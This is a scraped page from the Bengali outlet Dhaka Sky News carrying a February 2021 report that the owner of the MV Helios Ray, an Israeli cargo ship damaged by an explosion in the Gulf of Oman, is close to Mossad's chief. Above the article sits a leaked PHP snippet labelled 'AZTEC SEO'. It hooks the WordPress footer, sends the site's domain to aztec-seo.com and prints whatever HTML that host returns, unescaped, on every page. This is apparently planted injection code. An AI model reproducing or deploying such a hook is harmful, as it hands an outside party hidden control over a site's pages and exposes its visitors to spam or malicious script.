/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); ওমান সাগরে বিস্ফোরণে ক্ষতিগ্রস্ত জাহাজের মালিক মোসাদ প্রধানের ঘনিষ্ঠ লোক | Dhaka Sky News

ক্রিটিক্যাল পয়েন্টে পরমাণু সমঝোতা, নিষেধাজ্ঞা প্রত্যাহারের আহ্বান জানালো চীন

আগের সংবাদ

ইরানের ঋণ পরিশোধের কাজ শিগগিরই শুরু হবে: ইরাকের পররাষ্ট্রমন্ত্রী

পরের সংবাদ

ওমান সাগরে বিস্ফোরণে ক্ষতিগ্রস্ত জাহাজের মালিক মোসাদ প্রধানের ঘনিষ্ঠ লোক

ঢাকা স্কাইনিউজ ডেস্ক

প্রকাশিত: February 27, 2021 , 9:40 pm

ওমান সাগরে বিস্ফোরণে ক্ষতিগ্রস্ত ইহুদিবাদী ইসরাইলের কার্গো জাহাজের প্রকৃত মালিকের পরিচয় পাওয়া গেছে। তিনি ইজরায়েলের গুপ্তচর সংস্থা মোসাদের প্রধান ইয়োসি কোহেনের ঘনিষ্ঠ ব্যক্তি বলে ইসরাইলের গণমাধ্যম খবর দিয়েছে।

‘এমভি হেলিয়স রে’ নামের এ জাহাজটির মালিক ৭৪ বছর বয়সী আব্রাহাম উনগার যার ছদ্মনাম রামি। তিনি ইসরাইলের অন্যতম প্রধান ধনাঢ্য ব্যক্তি এবং তিনিই প্রতিষ্ঠা করেছেন তেল আবিবভিত্তিক ‘রে শিপিং লিমিটেড’।

ব্রিটেনের মেরিটাইম ট্রেড অপারেশন্সের তথ্য মতে- এমভি হেলিয়স রে সৌদি আরবের দাম্মাম বন্দর থেকে গাড়ি বহন করছিল। আগামী ৫ মার্চ জাহাজটির সিঙ্গাপুর পৌঁছানোর কথা ছিল।

বিস্ফোরণে ইসরাইলি জাহাজে গর্তের সৃষ্টি হয়েছে

জাহাজের মালিক রামি উনগারের বরাত দিয়ে ইসরাইলের একটি সংবাদ মাধ্যম জানিয়েছে, বিস্ফোরণের ফলে জাহাজটিতে দেড় মিটার ব্যাসার্ধের দুটি গর্তের সৃষ্টি হয়েছে তবে ইঞ্জিনের কোনো ক্ষয়ক্ষতি কিংবা ক্রুদের কেউ হতাহত হয় নি। সূত্র : পার্সটুডে